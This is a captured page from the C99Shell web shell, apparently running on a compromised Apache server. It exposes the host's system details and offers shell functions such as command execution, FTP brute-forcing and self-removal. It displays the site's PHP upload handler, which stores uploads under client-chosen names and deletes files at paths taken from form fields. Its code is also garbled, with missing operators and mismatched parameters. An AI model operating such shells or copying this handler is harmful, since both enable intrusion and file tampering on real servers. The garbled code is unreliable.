!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16. PHP/5.4.16 

uname -a: Linux roko-bkp 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64 

uid=48(apache) gid=48(apache) groups=48(apache),1003(webmaster) 

Safe-mode: OFF (not secure)

/var/www/html/admin/comunicados/   drwxr-xr-x
Free 9.43 GB of 93.48 GB (10.08%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     comunicado_grava.php (2.68 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
    include("../../config/config.php");
    include(INCLUDES "conexaoBD.php");
    include(INCLUDES "sentencas_sql.php");
    include(INCLUDES "funcoes_uteis.php");
    include(INCLUDES "valida_usuario.inc.php");

    $tamanhoUp 1024*1024*20;
    $erro false;
    if ($_FILES['arqVideo']['size'] > $tamanhoUp || $_FILES['arqComunicado']['size'] > $tamanhoUp) {
        $msg "Tamanho maximo permitido é de 20MB";
        $erro true;
    }

    $data $_POST['data'];

    $data explode('/',$data);

    $idComunicado = isset($_POST['idComunicado']) ? $_POST['idComunicado'] : false;
    $titulo       $_POST["txtTitulo"];
    $arqVideo     $_POST["arqVideoAntigo"];
    $arqAntigo    $_POST["arqAntigo"];
    $data         $data[2].'-'.$data[1].'-'.$data[0];

    if (! $titulo) {
        $msg "Informe um titulo.";
        Redireciona('comunicado_cad.php',array('msg' => $msg'erro' => true));
        return false;
    }

    if ($idComunicado) {
        if ($_FILES['arqVideo']) {
            if (file_exists($arqVideo)) {
                unlink($arqVideo);
            }
        }
        if ($_FILES['arqAlternativo']) {
            if (file_exists($arqAntigo)) {
                unlink($arqAntigo);
            }
        }
    }
   
    if (!is_dir("../../arquivos/comunicados/")) {
        mkdir("../../arquivos/comunicados");
    }

    if (isset($_FILES['arqVideo'])) {
        $uploadDirV "../../arquivos/comunicados/{$_FILES['arqVideo']['name']}";
        move_uploaded_file($_FILES['arqVideo']['tmp_name'], $uploadDirV);
    }
    if (isset($_FILES['arqComunicado'])) {
        $uploadDirA "../../arquivos/comunicados/{$_FILES['arqComunicado']['name']}";
        move_uploaded_file($_FILES['arqComunicado']['tmp_name'], $uploadDirA);
    }

    if (!$idComunicado) {
        $sql "INSERT INTO comunicados (COM_Video,COM_Arquivo,COM_Titulo,COM_Data) VALUES (?,?,?,?)";
        $stmt $conexao->prepare($sql);
        $stmt->bind_param('ssss',$_FILES['arqVideo']['name'],$_FILES['arqComunicado']['name'],$titulo$data);
        $stmt->execute();
        $conexao->commit();
    } else {
        $nomeVideo $_FILES['arqVideo']['name'] ? $_FILES['arqVideo']['name'] : $arqVideo;
        $nomeArquivo $_FILES['arqComunicado']['name'] ? $_FILES['arqComunicado']['name'] : $arqAntigo;
        $sql "UPDATE comunicados SET COM_Video = ?, COM_Arquivo = ?,COM_Titulo = ?, COM_Data = ? WHERE COM_RowID = ?";
        $stmt $conexao->prepare($sql);
        $stmt->bind_param('ssssi',$nomeVideo,$nomeArquivo,$titulo,$idComunicado$data);
        $stmt->execute();
        $conexao->commit();
    }
    
    Redireciona('comunicado_cad.php',array('msg' => 'Dados salvos com sucesso.'));
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 
:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0033 ]--